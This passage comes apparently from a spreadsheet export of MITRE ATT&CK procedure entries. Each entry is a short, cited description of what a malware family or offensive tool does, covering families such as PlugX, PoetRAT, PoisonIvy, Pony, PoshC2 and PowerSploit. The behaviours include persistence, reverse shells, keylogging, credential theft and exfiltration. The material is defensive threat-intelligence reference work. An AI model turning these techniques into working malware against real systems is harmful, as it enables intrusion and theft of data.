    <t>[PlugX](https://attack.mitre.org/software/S0013) adds Run key entries in the Registry to establish persistence.(Citation: Lastline PlugX Analysis)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) allows the operator to capture screenshots.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can use RC4 encryption in C2 communications.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) checks if VMware tools is running in the background by searching for any process named "vmtoolsd".(Citation: Unit42 PlugX June 2017)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) has a module for enumerating TCP and UDP network connections and associated processes using the &lt;code&gt;netstat&lt;/code&gt; command.(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be configured to use HTTP for command and control.(Citation: Dell TG-3390)(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) allows actors to spawn a reverse shell on a victim.(Citation: Dell TG-3390)(Citation: CIRCL PlugX March 2013)</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) can be added as a service to establish persistence. [PlugX](https://attack.mitre.org/software/S0013) also has a module to change service configurations as well as start, control, and delete services.(Citation: CIRCL PlugX March 2013)(Citation: Lastline PlugX Analysis)(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)(Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to compress files with zip.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt command and control (C2) communications.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used file system monitoring to track modification and enable automatic exfiltration.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has executed a Lua script through a Lua interpreter for Windows.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Browdec.exe to steal browser credentials.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used LZMA and base64 libraries to decode obfuscated scripts.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was delivered with documents using DDE to execute malicious code.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a .NET tool named dog.exe to exiltrate information over an e-mail account.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has exfiltrated data over the C2 channel.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used [ftp](https://attack.mitre.org/software/S0095) for exfiltration.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to overwrite scripts and delete itself if a sandbox environment is detected.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used FTP for C2 communications.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list files upon receiving the &lt;code&gt;ls&lt;/code&gt; command from C2.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to hide and unhide files.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to copy files and download/upload files into C2 channels using FTP and HTTPS.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named klog.exe for keylogging.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used voStro.exe, a compiled pypykatz (Python version of [Mimikatz](https://attack.mitre.org/software/S0002)), to steal credentials.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used spearphishing attachments to infect victims.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has made registry modifications to alter its behavior upon execution.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt communications over port 143(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a custom encryption scheme for communication between scripts and pyminifier to obfuscate scripts.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to list all running processes.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has added a registry key in the &lt;RUN&gt; hive for persistence.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) used Nmap for remote system discovery.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to take screen captures.(Citation: Talos PoetRAT April 2020)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) was distributed via malicious Word documents.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of "License.txt" and exiting.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to gather information about the compromised host.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a "who" command from C2.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used a Python tool named Bewmac to record the webcam on compromised hosts.(Citation: Talos PoetRAT April 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used Word documents with VBScripts to execute malicious activities.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has used HTTP and HTTPs for C2 communications.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) has called cmd through a Word document macro.(Citation: Talos PoetRAT October 2020)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry key in the Active Setup pointing to a malicious executable.(Citation: Microsoft PoisonIvy 2017)(Citation: paloalto Tropic Trooper 2016)(Citation: FireEye Regsvr32 Targeting Mongolian Gov)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) captures window titles.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can steal system information.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) can inject a malicious DLL into a process.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can upload files.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) contains a keylogger.(Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) stages collected data in a text file.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new system device.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) hides any strings related to its own indicators of compromise.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates run key Registry entries pointing to a malicious executable dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) starts a rootkit from a malicious file dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) uses the Camellia cipher to encrypt communications.(Citation: FireEye Poison Ivy)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a backdoor through which remote attackers can open a command-line interface.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new service. [PoisonIvy](https://attack.mitre.org/software/S0012) also creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk.(Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use Twitter, Reddit, Imgur and other websites to get a C2 URL.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use a custom algorithm to decrypt strings used by the malware.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can retrieve payloads from the C2 server.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can write encrypted JSON configuration files to the Registry.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use &lt;code&gt;LoadLibraryW&lt;/code&gt; and &lt;code&gt;CreateProcess&lt;/code&gt; to load and execute code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can custom encrypt strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can be executed using rundll32.exe.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) can use steganography to hide C2 information in images.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) has has used HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) can download additional files onto the infected system.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used the &lt;code&gt;NetUserEnum&lt;/code&gt; function to enumerate local accounts.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into downloading an attached executable (ZIP, RAR, or CAB archives) or document (PDF or other MS Office format).(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has attempted to lure targets into clicking links in spoofed emails from legitimate banks.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used the Adobe Reader icon for the downloaded file to look more trustworthy.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used several Windows functions for various purposes.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) attachments have been delivered via compressed archive files. [Pony](https://attack.mitre.org/software/S0453) also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used a small dictionary of common passwords against a collected list of local accounts.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing attachments.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing emails which contained malicious links.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has collected the Service Pack, language, and region information to send to the C2.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has delayed execution using a built-in function to avoid detection and analysis.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has sent collected information to the C2 via HTTP POST request.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Pony](https://attack.mitre.org/software/S0453) has used batch scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)	</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-TokenManipulation for manipulating tokens.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for compressing data using ZIP.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for recursively parsing through files and directories to gather valid credit card numbers.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for brute forcing local administrator and AD user accounts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can utilize multiple methods to bypass UAC.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Invoke-RunAs to make tokens.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules for searching for passwords in local and remote files.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can decrypt passwords stored in the RDCMan configuration file.(Citation: SecureWorks August 2019)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate local and domain user account information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for enumerating domain trusts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for exploiting SMB via EternalBlue.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate files on the local file system and includes a module for enumerating recently accessed files.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-LocAdm&lt;/code&gt; for enumerating permission groups.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can perform port scans from an infected host.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains a module for taking packet captures on compromised hosts.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that leverage pass the hash for lateral movement.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use &lt;code&gt;Get-PassPol&lt;/code&gt; to enumerate the domain password policy.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules that allow for use of proxies in command and control.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [PsExec](https://attack.mitre.org/software/S0029) for remote execution.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains modules, such as &lt;code&gt;Get-ComputerInfo&lt;/code&gt;, for enumerating common system information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate network adapter information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [netstat](https://attack.mitre.org/software/S0104) to enumerate TCP and UDP connections.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can enumerate service and service permission information.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) can use protocols like HTTP/HTTPS for command and control traffic.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that use WMI to execute tasks.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) has the ability to persist on a system using WMI events.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can side-load `Goopdate.dll` into `GoogleUpdate.exe`.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can decrypt PowerShell scripts for execution.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can receive encrypted commands from C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) has disguised a PowerShell script as a .dat file (goopdate.dat).(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) has used a DLL named Goopdate.dll to impersonate a legitimate Google update file.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can use a modified Base64 encoding mechanism to send data to and from the C2 server.(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) has the ability to use PowerShell scripts to execute commands.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[PowGoop](https://attack.mitre.org/software/S1046) can send HTTP GET requests to malicious servers.(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>[Power Loader](https://attack.mitre.org/software/S0177) overwrites Explorer’s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe.(Citation: MalwareTech Power Loader Aug 2013)(Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get text of the current foreground window.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to write random data across a file and delete it.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to download a file.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) hides many of its backdoor payloads in an alternate data stream (ADS).(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to list the victim's processes.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) achieves persistence by using various Registry Run keys.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) uses rundll32.exe to load.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[PowerDuke](https://attack.mitre.org/software/S0139) uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).(Citation: Volexity PowerDuke November 2016) </t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get information about the victim's name, build, version, serial number, and memory usage.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has a command to get the victim's domain and NetBIOS name.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the current user's name and SID.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) has commands to get the time the machine was built, the time, and the time zone.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) runs &lt;code&gt;cmd.exe /c&lt;/code&gt; and sends the output to its C2.(Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can encrypt browser database files prior to exfiltration.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can use a .NET browser information stealer module.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[PowerLess](https://attack.mitre.org/software/S1012) has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines.(Citation: Cybereason PowerLess February 2022)
</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can use base64 and AES ECB decryption prior to execution of downloaded modules.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can use an encrypted channel for C2 communications.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can download additional payloads to a compromised host.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can use a module to log keystrokes.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can stage stolen browser data in `C:\\Windows\\Temp\\cup.tmp` and keylogger data in `C:\\Windows\\Temp\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) is written in and executed via PowerShell without using powershell.exe.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) can use the volume serial number from a target host to generate a unique XOR key for the next stage payload.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) can download payloads from adversary infrastructure.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) can use Base64-encoded scripts.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) has the ability to execute through PowerShell.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to remove all files created during the dropper process.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) is a backdoor written in PowerShell.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to deploy a reconnaissance module to retrieve a list of the active processes.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) sets up persistence with a Registry run key.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to encode C2 communications with base64 encoding.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has collected system information on the infected host.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current Windows domain of the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current user on the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to save and execute VBScript.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; Exfiltration module can be used to manipulate tokens.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-MicrophoneAudio&lt;/code&gt; Exfiltration module can record system microphone audio.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) has several modules that search the Windows Registry for stored credentials: &lt;code&gt;Get-UnattendedInstallFile&lt;/code&gt;, &lt;code&gt;Get-Webconfig&lt;/code&gt;, &lt;code&gt;Get-ApplicationHost&lt;/code&gt;, &lt;code&gt;Get-SiteListPassword&lt;/code&gt;, &lt;code&gt;Get-CachedGPPPassword&lt;/code&gt;, and &lt;code&gt;Get-RegistryAutoLogon&lt;/code&gt;.(Citation: Pentestlab Stored Credentials)</t>
  </si>
  <si>
